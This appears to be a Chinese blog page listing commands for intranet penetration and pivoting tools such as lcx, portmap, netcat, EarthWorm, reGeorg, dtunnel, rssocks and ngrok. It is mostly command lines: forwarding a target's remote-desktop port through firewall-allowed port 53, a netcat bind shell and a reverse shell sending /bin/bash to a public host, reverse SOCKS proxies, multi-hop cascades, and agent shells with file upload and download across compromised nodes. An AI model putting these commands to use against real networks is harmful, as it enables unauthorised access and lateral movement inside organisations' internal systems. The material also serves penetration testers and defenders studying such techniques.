赞
踩
目录
公网主机上执行:lcx.exe –listen 公网主机端口1 公网主机端口2,意思是监听公网主机本机的 4444 端口请求,并将来自 4444 端口的请求传送给 5555 端口。
- 内网:lcx.exe -slave 公网主机IP 4444 127.0.0.1 3389 或者 $ portmap -m 3 -h1 公网IP -p1 4444 -h2 127.0.0.1 -p2 3389
- 公网:lcx.exe –listen 4444 5555 或者 $ portmap -m 2 -p1 4444 -p2 5555
此时直接访问:公网IP:5555,即可转发到内网IP的3389
由于防火墙限制,部分端口如3389无法通过防火墙,此时可以将该目标主机的3389端口透传到防火墙允许的其他端口,如53端口,目标主机上执行:
lcx.exe -tran 53 目标主机IP 3389 或者 $ portmap -m 1 -p1 53 -h2 目标IP -p2 3389
这时我们可以直接远程桌面连接到目标主机IP:53
在公网主机上执行下面命令,监听8888端口,等待连接:
$ nc -l -p 8888 -e /bin/bash
在本地主机上执行下面命令,获得一个shell:
$ nc ip 8888
在公网主机上进行监听:
$ nc -lvp 8888
在内网主机上执行下面命令,将shell反弹给公网IP:
$ nc -e /bin/bash 公网IP 8888
1.正向SOCKS v5服务器
直接在服务器上面执行下面命令,将本机作为SOCKS5服务器使用,一般是在公网IP上面执行:
$ ./ew -s ssocksd -l 1080
然后将该主机作为SOCKS5服务器:
$ curl ip.cn -x socks5://公网IP:1080
2.反弹SOCKS v5服务器
(1)先在一台具有公网 ip 的主机A上运行以下命令:
$ ./ew -s rcsocks -l 1080 -e 8888
(2)在目标主机B上启动SOCKS v5服务,并反弹到公网主机的8888端口:
$ ./ew -s rssocks -d 1.1.1.1 -e 8888
让后通过公网1080端口将内网主机作为SOCKS5服务器:
$ curl ip.cn -x socks5://1.1.1.1:1080
3.多级级联
工具中自带的三条端口转发指令,参考lcx工具命令,它们的参数格式分别为:
- $ ./ew -s lcx_listen -l 1080 -e 8888
- $ ./ew -s lcx_slave -d 1.1.1.1 -e 8888 -f 2.2.2.3 -g 9999
- $ ./ew -s lcx_tran -l 1080 -f 2.2.2.3 -g 9999
通过这些端口转发指令可以将处于网络深层的基于TCP的服务转发至根前,比如SOCKS v5。
二级级联案例
1.lcx_tran 的用法
- $ ./ew -s ssocksd -l 9999 # 将本机9999端口作为SOCKS5服务器
- $ ./ew -s lcx_tran -l 1080 -f 127.0.0.1 -g 9999 # 将本机的1080端口转发到127.0.0.1上的9999端口
2.lcx_listen、lcx_slave 的用法
- $ ./ew -s lcx_listen -l 1080 -e 8888 # 监听1080端口并转发到8888端口
- $ ./ew -s lcx_slave -d 127.0.0.1 -e 8888 -f 127.0.0.1 -g 9999 # 将127.0.0.1的9999端口转发到127.0.0.1的8888端口
- $ ./ew -s ssocksd -l 9999 # 将本机9999端口作为SOCKS5服务器
数据流流向:SOCKS v5 -> 1080 -> 8888 -> 9999 -> rssocks
三级级联案例
- $ ./ew -s rcsocks -l 1080 -e 8888
- $ ./ew -s lcx_slave -d 127.0.0.1 -e 8888 -f 127.0.0.1 -g 9999
- $ ./ew -s lcx_listen -l 9999 -e 7777
- $ ./ew -s rssocks -d 127.0.0.1 -e 7777
4.补充说明
使用方法
1.以服务模式启动一个agent服务。
> $ ./agent -l 8888
2.令管理端连接到agent并对agent进行管理。
> $ ./admin -c 127.0.0.1 -p 8888
3.此时,admin端会得到一个内置的shell, 输入help指令可以得到帮助信息。
>> help
4.通过show指令可以得到当前agent的拓扑情况。
- >> show
- 0M
- +-- 1M
由于当前拓扑中只有一个agent,所以展示结果只有 1M,其中1 为节点的ID号,M为MacOS系统的简写,Linux为L,Windows简写为W。
5.将新agent加入当前拓扑
> ./agent -c 127.0.0.1 -p 8888
6.此时show指令将得到如下效果
- 0M
- +-- 1M
- | +-- 2M
- # 这表明,当前拓扑中有两个节点,其中由于2节点需要通过1节点才能访问,所以下挂在1节点下方。
7.在2节点开启socks代理,并绑定在本地端口
- >> goto 2 #将当前被管理节点切换为 2 号节点。
- >> socks 1080 # 此时,本地1080 端口会启动个监听服务,而服务提供者为2号节点。
8.在1号节点开启一个shell并绑定到本地端口
- >> goto 1
- >> shell 7777 # 此时,通过nc本地的 7777 端口,就可以得到一个 1 节点提供的 shell
9.将远程的文件下载至本地
- >> goto 1
- >> downfile 1.txt 2.txt # 将1 节点,目录下的 1.txt 下载至本地,并命名为2.txt
10.上传文件至远程节点
- >> goto 2
- >> upfile 2.txt 3.txt # 将本地的 2.txt 上传至 2号节点的目录,并命名为3.txt
11.端口转接
- >> goto 2
- >> lcxtran 3388 10.0.0.1 3389 # 以2号节点为跳板,将 10.0.0.1 的 3389 端口映射至本地的 3388 端口
更多支持:
使用方法
1.首先在公网服务器上面启动服务,监听端口:
$ dtunnel_s -addr 0.0.0.0:8888 -ssl=false
服务端参数说明:
2.远端客户端连接服务端:
- $ dtunnel -buster 1.2.3.4:8018 -remote 1.2.3.4:8888 -mode 0 -reg redis -local :6379 -addip 127.0.0.1 -clientkey password -ssl=false
- # 如果需要开启SOCKS5服务,修改-local参数即可,近端无需修改
- $ dtunnel -buster 1.2.3.4:8018 -remote 1.2.3.4:8888 -mode 0 -reg redis -local socks5 -addip 127.0.0.1 -clientkey password -ssl=false
3.近端客户端了解客户端:
$ dtunnel -buster 1.2.3.4:8018 -remote 1.2.3.4:8888 -mode 0 -link redis -local :9999 -addip 127.0.0.1 -clientkey password -ssl=false -encrypt
客户端参数说明:
- $ nc 127.0.0.1 9999
- # 或者
- $ curl ip.cn -x socks5://127.0.0.1:9999
使用方法
2.运行该来程序启动代理:
$ python reGeorgSocksProxy.py -p 8080 -u http://upload.sensepost.net:8080/tunnel/tunnel.jsp
3.使用SOCKS客户端连接使用IP:8080服务器。
$ curl ip.cn -x socks5://127.0.0.1:8080
下载解压后,执行命令编译
./configure && make
编译完成,进入src目录,会发现有nsocks、ssocksd、ssocks、rcsocks,其功能说明介绍如下:
使用方法
公网主机上执行:
$ rcsocks -l 4444 -p 5555 -vv
内网主机上执行:
$ rssocks –vv --socks 公网主机ip:5555
这时本地主机可以通过访问公网主机的 4444 端口访问内网主机:
$ curl --socks5 公网IP:4444 https://api.ip.sb/ip
使用方法:
- $ python proxy.py -u http://10.3.3.1/test/conn.aspx -l 4444 -r 3389 -v
- # 通过连接本地的4444端口转发到服务器的3389端口
使用方法
将程序放到需要映射的主机,然后执行命令,如:
$ ngrok http 80 # 映射本地80端口的HTTP服务
返回一个*.ngrok.io地址,访问改地址即可访问内网服务。
- $ ngrok http foo.dev:80 # 映射host:80隧道,而不是本地端口
- $ ng0rok tcp 22 # 映射22端口的TCP隧道
- $ ngrok tls -hostname=foo.com 443 # foo.com的TLS流量到443端口的隧道
Copyright © 2003-2013 www.wpsshop.cn 版权所有,并保留所有权利。